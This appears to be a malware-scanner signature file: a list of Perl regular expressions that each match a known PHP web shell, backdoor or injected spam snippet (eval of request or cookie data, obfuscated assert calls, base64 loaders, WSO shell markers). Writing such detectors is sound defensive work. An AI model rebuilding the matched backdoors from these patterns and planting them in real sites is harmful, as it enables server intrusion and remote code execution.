qr/<\?php\s+define\(\'\_JEXEC\'\,\s+1\)\;\s+try\{.+?if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\=\=.+?\$db\->query\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+define\(\'\_JEXEC\'\,\s+1\)\;\s+try\{.+?if\s+\(\s+md5\(getenv\(\'HTTP\_USER\_AGENT\'\)\)\s+\=\=.+?eval\(\$data\_row\->htmlcode\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"ass\".\"ert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+?\?>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"preg\_\"\.\"repla\"\.\"ce\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/\s+\$([A-z0-9]{1,20})\s+\=\s+\'([A-z0-9]{10,})\+([A-z0-9]{20,})\'\..+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;.+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(\".+?\)\)\)\;\s+eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?\)\)\)\;\Z/is,
qr/<\?php\s+if\s+\(\!isset\(\$\_SERVER\[\'REQUEST\_URI\'\]\)\s+\|\|\s+ltrim\(\$\_SERVER\[\'REQUEST\_URI\'\]\,\'\/\'\)\s+\=\=\=\s+\'\'\)\s+\{\s+print\s+\'<div\s+class\=\"([A-z0-9]{1,20})\"\s+style\=\"position\:\s+absolute\;\s+left\:\s+\-9999px\;\">\s+\<a\s+href=\"http\:\/\/.+?casino.+?<\/a><\/div>\'\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\"\,([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\;\s+\$([A-z0-9]{1,20})\(\"\"\)\;\s+\$([A-z0-9]{1,20})\=\(([0-9]{1,10})\-([0-9]{1,10})\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\$str\s+\=\s+\"([A-z0-9]{1,20})\"\;\$Oo0\=\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\.\$str\{([0-9]{1,10})\}\;\$([A-z0-9]{1,20})\s+\=\$\_POST\[\"([A-z0-9]{1,20})\"\]\;\$Oo0\(\$([A-z0-9]{1,20})\)\;\?>/is,
qr/<\?php\s+\$OO00O0\=1\;\$O0O0O0\=1\;eval\s+\(gzinflate\s+\(base64\_decode\s+\(str\_rot13\s+\(.+?\)\)\)\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20}).+?\.chr\(([0-9]{1,10})\)\.\$([A-z0-9]{1,20})\[([0-9]{1,10})\]\.chr\(([0-9]{1,10})\)\..+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20}).+?\.chr\(([0-9]{1,10})\).+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\.chr\(([0-9]{1,10})\).+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$domain\s+\=\s+\'gas\.liveupdates\.host\'\;.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$m\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+header\(\'Content\-Type\:text\/html\;\s+charset\=UTF\-8\'\)\;\s+\@set\_time\_limit\(0\)\;\s+define\(\'PASSWORD\_FILE\'\,\s+\'p\.txt\'\)\;.+?if\(\!file\_exists\(PASSWORD\_FILE\)\)\s+\{.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\@error\_reporting\(0\)\;.+?function\s+Send\(\)\{.+?\$replyto\=check\_gmail\(\$replyto\)\;.+?return\s+\$result\.\'\@gmail\.com\'\;\s+\}\s+\?>/is,
qr/\"\s+\.\s+base64\_decode\(\"\'\.\$wp\_code\.\'\"\)\)\;\s+\?>\'\;\s+\$wp\_dec\_file\s+\=\s+base64\_decode\(\$wp\_code\)\;.+?\/\/print\s+PLATFORM\;\s+\/\/print\_r\(\$all\_dirs\)\;\s+\?>/is,
qr/<\?php\s+class\s+ControllerProductDesign\s+\{.+?\$this\->muf\=\$this\->dispatch\(\'GIF89alxWam9FZlRWYvxGc19VZ29Wb\'\)\;.+?\$model\->\_continue\(\'done\'\)\;\s+\}/is,
qr/<\?php\s+eval\(\"\?>\"\s+\.\s+base64\_decode\(\".+?\"\)\)\;\s+\?>\s+<\?php\s+\/\*a\,b\,c.+?\*\/\s+\?>/is,
qr/<\?php\s+\$o\=\"([A-z0-9]{1,20}).+?\"\;eval\(base64\_decode\(\".+?\)\)\;return\;\?>/is,
qr/<\?php\s+error\_reporting\s+\(0\)\;.+?if\s+\(array\_key\_exists\s+\(\'delete\'\,\s+\$\_REQUEST\)\).+?\$domains\s+\=\s+get\_user\_domains\s+\(\)\;.+?return\s+join\(\'\.\'\,\s+\$arr\)\;\s+\}\s+\?>/is,
qr/<\?php.+?\$me\s+\=\s+basename\(\_\_FILE\_\_\)\;.+?\}\s+function\s+reload\(\)\{header\(\"Location\:\s+\"\.basename\(\_\_FILE\_\_\)\)\;\}.+?\'\.\'\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?if\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\/\*([A-z0-9]{1,20})\'\..+?exit\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$.+?\(\/\*([A-z0-9]{1,20})\'\..+?false\,\$([A-z0-9]{1,20}).+?([A-z0-9]{1,20})\'\;/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+if\(isset\(\$\_REQUEST\[\"start\"\]\)\s+\&\&\s+md5\(\$\_REQUEST\[\"start\"\]\)\s+\=\=\s+\'([A-z0-9]{32})\'\s+\&\&\s+isset\(\$\_REQUEST\[\"stort\"\]\)\)\s+eval\(base64\_decode\(\$\_REQUEST\[\"stort\"\]\)\)\;\?>/is,
qr/<\?php\s+\/\*\s+VTY\s+\-\s+Database\s+Manager\s+For\s+Mysql.+?\$vty\->BitimIslemleri\(\)\;\s+exit\;\s+\}\s+\?>\s+<\?php.+?class\s+dug\s+\{.+?function\s+menu\(\)\{\s+\?>\s+<table.+?\}\/\/class\:db\s+\?>/is,
qr/\$([A-z0-9]{1,20})\=\"\-1\(.+?\$([A-z0-9]{1,20})\=array\(\"([A-z0-9]{1,20})\"\=>\".+?\"\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\"\"\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;if\(\$([A-z0-9]{1,20})\(\@\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\]\)\=\=\$([A-z0-9]{1,20})\)\$([A-z0-9]{1,20})\(\)\;/is,
qr/\/\*([A-z0-9]{1,10})\*\/\s+\@include\s+\"\Wx.+?\"\;\s+\/\*([A-z0-9]{1,10})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,10})\s+\=.+?\$\_([A-z0-9]{1,10})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,10})\'\,\s+([A-z0-9]{1,10})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,10})\(\$([A-z0-9]{1,10})\)\;\s+function\s+([A-z0-9]{1,10})\s+\(\$([A-z0-9]{1,10})\,\s+\$([A-z0-9]{1,10})\)\s+\{\s+return\s+\$([A-z0-9]{1,10})\s+\^\s+str\_repeat\s+\(\$([A-z0-9]{1,10})\,\s+ceil\s+\(strlen\s+\(\$([A-z0-9]{1,10})\)\s+\/\s+strlen\s+\(\$([A-z0-9]{1,10})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$k\=\"ass\"\.\"ert\"\;\s+\$k\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'admins\'\]\)\;\?>No\.1\s+<\?php\s+\@preg\_replace\(\"\/\/e\"\,\$\_POST\[\'sss\'\]\,\"Access\s+Denied\"\)\;\?>/is,
qr/<\?php\s+\/\*\s+WSO\s+\[2\.6\]\s+\*\/\$OOO000000\=urldecode\(.+?\=\_\_FILE\_\_\;\$.+?([A-z0-9]{1,20})\Z/is,
qr/<\?php\+\$c\=base64\_decode\(\'([A-z0-9]{1,20})\=\'\)\.\$\_GET\[\'n\'\]\.\'t\'\;\@\$c\(\$\_POST\[\'x\'\]\)\;\?>abcabcabc/is,
qr/<\?php\s+if\s+\(\$\_REQUEST\[\'action\'\]\s+\=\=\s+\'([A-z0-9]{1,10})\'\)\s+\{\s+\$in\_data\s+\=\s+base64\_decode\(\$\_REQUEST\[\'query\'\]\)\;\s+\$fr\s+\=\s+explode\(\'\|\'\,\s+\$in\_data\)\;\s+if\s+\(mail\(stripslashes\(base64\_decode\(\$fr\[0\]\)\)\,\s+stripslashes\(base64\_decode\(\$fr\[1\]\)\)\,\s+base64\_decode\(\$fr\[2\]\)\,\s+stripslashes\(base64\_decode\(\$fr\[3\]\)\)\)\)\s+\{echo\s+\'query\'\;\}\s+else\s+\{echo\s+\'bad\s+request\'\;\}\s+\}\s+else\s+\{echo\s+\'not\s+found\'\;\}/is,
qr/<head>\s+<meta\s+name\=\"description\"\s+content\=\"ok\s+file\s+uploaded\">\s+<meta\s+http\-equiv\=\"refresh\"\s+content\=\"0\;URL\=http.+?\"\/>\s+<\/head>/is,
qr/<?php.+?function\s+pre\_term\_name\(\s+\$wp\_kses\_data\,\s+\$wp\_nonce\s+\)\s+\{.+?\$\_COOKIE\[\'f\_wp\'\]\s+\:\s+NULL\)\;\s+\$wp\_auth\_check\s+\=\s+\'<form\s+method\=\s+\"post\"\s+action\=\s+\"\">.+?preg\_match\(\'\#<img\s+src\=\"data\:image\/png\;base64\,\(\.\*\)\">\#\'\,\s+\$wp\_default\_logo\,\s+\$logo\_data\)\;.+?echo\s+\$wp\_auth\_check\;\s+\?>/is,
qr/<\?php\s+header\(\"HTTP\/1\.1\s+404\s+Not\s+Found\"\)\;.+?if\(file\_exists\(\'\.\/\.\.\/\.\.\/wp\-load\.php\'\)\)\s+require\(\'\.\/\.\.\/\.\.\/wp\-load\.php\'\)\;.+?else\s+\@unlink\(\_\_FILE\_\_\)\;.+?\?>/is,
qr/<?php.+?function\s+pre\_term\_name\(\s+\$wp\_kses\_data\,\s+\$wp\_nonce\s+\)\s+\{.+?\$wp\_auth\_check\s+\=\s+\'<form\s+method\=\s+\"post\"\s+action\=\s+\"\">.+?echo\s+\$wp\_auth\_check\;\s+\?>/is,
qr/<\?php\s+echo\s+\"javaversion1\"\;\s+passthru\(\$\_POST\[libso\]\)\;\s+\?>/is,
qr/\*\/\@eval\/\*\*/is,
qr/\*\/\(\/\*\*config\*\/\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*\*/is,
qr/<\?php\s+if\(\!\@\$([A-z0-9]{1,20})\)\{if\(preg\_match\(\'\/alltheweb\|aol\|baidu\|.+?\;endif\;endif\;return\$\_([A-z0-9]{1,50})\;\}\;/is,
qr/<\?php\s+if\(\!\@\$codevyp\)\{if\(preg\_match\(\'\/alltheweb\|aol\|baidu\|.+?\;\}\@\$codevyp\=true\;\}\?>/is,
qr/<\?php\s+if\(\!\@\$incode\!\=false\|\|\!\@\$incode\!\=null\).+?foreach\(scandir\(.+?\=true\;\$incode\=true\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,30})\=\".+?\"\;\s+eval\(base64\_decode\(gzuncompress\(base64\_decode\(\$([A-z0-9]{1,30})\)\)\)\)\;\?>/is,
qr/<\?php\s+\$auth\_pass.+?\$default\_action.+?\$userAgents\).+?\s+exit\;/is,
qr/<\?php\s+define\(\'vpsp\_version\'\,\s+\'2\.5\.0\'\)\;\s+define\(\'vpsp\_pwd\'.+?\}\s+else\s+\{\s+\$ok\s+\=\s+fread\(\$input\,\s+2\)\;\s+if\s+\(\$ok\s+\!\=\s+\'OK\'\)\s+\{\s+header\(\'X\-VPSP\-ERROR\:\s+bad\_request\'\)\;\s+header\(\'X\-VPSP\-HOST\:\s+\'\s+\.\s+\(isset\(\$\_SERVER\[\'HTTPS\'\]\).+?function\s+VC\_Decrypt\(\$str\).+?\}\s+return\s+\$out\;\s+\}/is,
qr/<\?php\s+preg\_replace\(\"\/\.\*\/e\"\,\"\Wx65.+?\Wx3B\"\,\"\.\"\)\;\s+\?>/is,
qr/<\?php\s+\$D\=strrev\(\'edoced\_46esab\'\)\;\$s\=gzinflate\(\$D\(.+?\)\)\;create\_function\(\'\'\,\"\}\$s\/\/\"\)\;\s+\?>/is,
qr/<\?php\s+\@set\_time\_limit\(0\)\;\s+if\(isset\(\$\_POST\[\'Enoc\'\]\)\).+?<script>\s+alert\(\'\-\-\-Todos\s+Spammed\-\-\-\'\)\;\s+<\/script>.+?<\/html>/is,
qr/<\?php\s+\@date\_default\_timezone\_set\(\'UTC\'\)\;\$\_\_\_\_\=base64\_decode\(.+?\=create\_function\(\'\'\,\'\?>.+?\'\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\$host\=base64\_decode.+?\$bot\=urlencode.+?\$ident\)eval\(stripslashes\(\$\_REQUEST\[base64\_decode\(.+?\)\]\)\)\;\?>/is,
qr/<\?php\s+\$payload\=.+?\;preg\_replace\(\'\/\.\*\/e\'\,\".+?\"\,\'\.\'\)\;\s+\?>/is,
qr/<\?php\s+function\s+\_([A-z0-9]{1,20})\(\$\_([A-z0-9]{1,20})\)\{\s+return\s+base64\_decode\(\$\_([A-z0-9]{1,20})\)\;\}\s+function\s+\_([A-z0-9]{1,20})\(\$\_([A-z0-9]{1,20})\)\{\s+return\s+gzinflate\(\$\_([A-z0-9]{1,20})\,0\)\;\}\s+function\s+\_([A-z0-9]{1,20})\(\$\_([A-z0-9]{1,20})\)\{\s+return\s+eval\(\$\_([A-z0-9]{1,20})\)\;\}.+?\"\;preg\_replace\(\'\/\.\*\/e\'\,\".+?\"\,\'\.\'\)\;\s+\?>/is,
qr/<\?php\s+\$\_([A-z0-9]{1,20})\=.+?\"\;\$\_([A-z0-9]{1,20})\=array\(.+?\)\;\$payload\=\".+?\"\"\;for\s+\(\$i\=.+?\Wx\d\d\"\)\;/is,
qr/<\?php\s+\$\{.+?set\_magic\_quotes\_runtime\(0\)\;if\(strtolower\(substr\(PHP\_OS\,0\,3\)\)\=\=.+?\{function\s+scandir\(\$dir\)\{\$\{.+?\"\;\}exit\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;.+?str\_replace\(\"\w\"\,\"\"\,\"s\wtr\w+r\we\wpl\wa\wc\we\"\)\;.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\"\w\"\,\s+\"\"\,\s+\"\wb\wa\ws\we6\w4\w+d\we\wco\wde\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\w\"\,\"\"\,\"cr\we\wat\we\w+f\wu\wnc\wt\wi\won\"\)\;.+?\?>/is,
qr/<\?php\s+\/\*\s+WSO.+?\=urldecode\(.+?eval\(\$GLOBALS\[.+?\=\=([A-z0-9]{1,20})/is,
qr/<\?php\s+set\_time\_limit\(0\)\;\s+header\(\"Content\-Type.+?function\s+listDir\(\$dir\)echo\s+\"ok\"\;\s+\?>/is,
qr/<\?php\s+\$\w\=base64\_decode\(\'.+?\'\)\.\$\_GET\[\'\w\'\]\.\'\w\'\;\@\$\w\(\$\_POST\[\'\w\'\]\)\;\?>abcabcabc/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_RE\"\.\"QUE\"\.\"ST\"\}\[\'.+?\'\]\)\)\{\$\w\=\"ass\"\.\"ert\"\;\$\w\(\$\{\"\_REQUEST\"\}\[\'.+?\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;exit\;\}\/\*.+?\*\//is,
qr/<script>\$\=\~\[\]\;\$\=\{\_\_\_\:\+\+\$\,\$\$\$\$\:\(\!\[\].+?\+\$\.\$\$\$\_\+\(\!\[\]\+\"\"\)\[\$\.\_\$\_\]\+\"\)\;\"\+\"\W\"\"\)\(\)\)\(\)\;<\/script>/is,
qr/<script\s+type\=\'text\/javascript\'>\s+var\s+\_([A-z0-9]{1,20})\=.+?\]\]\(\/\^\/\,String\)\)\{while\(.+?\]\]\(\s+new\s+RegExp\(.+?\]\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+if\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\/\*.+?\*\/\=\"preg\"\.\"\_rep\"\.\"lace\"\;\/\*.+?\*\/\$\w\(\'\/\/e\'\,\$\{\"\_REQUE\"\.\"ST\"\}\[\'.+?\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\{\/\*.+?\*\/\$\w\/\*.+?\*\/\=\/\*.+?\*\/\"asse\"\.\"rt\"\;\/\*.+?\*\/\$\w\=\$\w\/\*.+?\*\/\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\/\*.+?\*\/\;exit\;\/\*.+?\*\/\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}\?>/is,
qr/<\?php\s+if\/\*.+?\*\/\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\/\*.+?\*\/\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;\/\*.+?\*\/exit\;\}/is,
qr/<\?php\s+if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\/\*.+?\*\/\=\"as\"\.\"se\"\.\"rt\"\;\/\*.+?\*\/\$\w\=\$\w\/\*.+?\*\/\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\/\*.+?\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;\/\*.+?\*\/exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\/000\w+\s+if\s+\(\!extension\_loaded\(\'IonCube\_loader\'\)\).+?return\s+0\;\s+\?>.+?\Z/is,
qr/<html><body>.+?<\?php\s+error\_reporting\s+\(0\)\;.+?\&mode\=upload\'\s+method\s+\=\s+\'POST\'.+?clearstatcache\s+\(\)\;.+?echo\s+\"<\/table><br>\"\;/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'xftest\'\]\)\)die\(pi\(\)\*6\)\;\$\{.+?\=\@unserialize\(decode\(get\_params\(\$\{\$\{\"GLO.+?\]\}\;\}\s+\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?define\(\'ALREADY\_RUN\_.+?\$([A-z0-9]{1,20})\s+\=\s+Array\(.+?eval\/\*([A-z0-9]{1,20})\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\s+\}/is,
qr/<\?php\s+\/\*.+?\*\/if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUEST\"\}\[\'.+?\'\]\)\)\{\$\w\=\"assert\"\;\$\w\(\$\{\"\_REQUEST\"\}\[\'.+?\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*.+?\*\/if\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\/\*.+?\*\/\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;exit\;\}/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;\s+charset\=utf\-8\'\)\;.+?\$([A-z0-9]{1,20})\_\_\_\=urldecode\(.+?\)\;if\(\!function\_exists\(\'str\_ireplace\'\)\)\{function\s+str\_ireplace\(\$from\,\$to\,\$string\)\{return\s+trim\(preg\_replace\(\"\/\"\.addcslashes\(\$from.+?exit\(\)\;\}\}.+?\?>/is,
qr/<\?php\s+if\/\*.+?\*\/\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\/\*.+?\*\/eval\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\=\"as\"\.\"se\"\.\"rt\"\;\/\*.+?\*\/\$\w\=\$\w\(\/\*.+?\*\/\$\_REQUEST\[\'.+?\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'.+?\'\]\)\)\/\*.+?\*\/\{\$\w\=\/\*.+?\*\/\"pre\"\.\"g\_r\"\.\"epl\"\.\"ace\"\;\/\*.+?\*\/\$\w\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'.+?\'\]\,\'\'\)\;\/\*.+?\*\/exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\/\*.+?\*\/\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}\/\*.+?\*\//is,
qr/<\?php\s+set\_time\_limit\(0\)\;.+?<H1><center>config\s+root\s+man<\/center><\/H1>.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'.+?\'\]\)\)\{\/\*.+?\*\/\$\w\/\*.+?\*\/\=\/\*.+?\*\/\"preg\_replace\"\;\$\w\(\'\/\/e\'\,\$\{\"\_REQ\"\.\"UEST\"\}\[\'.+?\'\]\,\'\'\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}/is,
qr/<\?php\s+echo\s+\'([A-z0-9]{1,20})\'\;\s+preg\_replace\(\"\\x.+?\\x3B\"\,\"\\x2E\"\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?define\(\'ALREADY\_RUN\_.+?\$([A-z0-9]{1,20})\s+\=\s+Array\(.+?eval\/\*([A-z0-9]{1,20})\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\s+\}.+?\Z/is,
qr/<\?php\s+\/\/\#\#\#\=\=\=\=\#\#\#\s+\@error\_reporting\(E\_ALL\)\;.+?\@assert\_options\(ASSERT\_QUIET\_EVAL.+?\/\/\#\#\#\=\=\=\=\#\#\#\s+\?>/is,
qr/<\?php.+?\/\/\#\#\#\=\=\=\=\#\#\#\s+\@error\_reporting\(E\_ALL\)\;.+?\@assert\_options\(ASSERT\_QUIET\_EVAL.+?\/\/\#\#\#\=\=\=\=\#\#\#/is,
qr/<\?php\s+extract\(\$\_COOKIE\)\;\@\$F\&\&\(\@\$F\(\$A\,\$B\)\|\|\@\$W\(\$X\(\$Y\,\$Z\)\)\)\;/is,
qr/<\?php\s+eval\(\"\\n\\\$([A-z0-9]{1,20})\s+\=\s+intval\(\_\_LINE\_\_\)\s+\*\s+337\;\"\)\;\s+\$a\s+\=.+?\$a\s+\=\s+str\_replace\(\$([A-z0-9]{1,20})\,\s+\"E\"\,\s+\$a\)\;\s+eval\s+\(gzinflate\(base64\_decode\(\$a\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?function\s+([A-z0-9]{1,20})\(\$\w\)\{return\s+chr\(ord\(\$\w\)\-1\)\;\}\s+\@error.+?\$([A-z0-9]{1,20})\s+\=\s+implode\(array\_map.+?\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+if\(md5\(\$\_COOKIE\[\'\_wp\_debugger\'\]\)\=\=\"([A-z0-9]{32})\"\)\{\s+eval\(base64\_decode\(\$\_POST\[\'file\'\]\)\)\;\s+exit\;\s+\}\s+\?>/is,
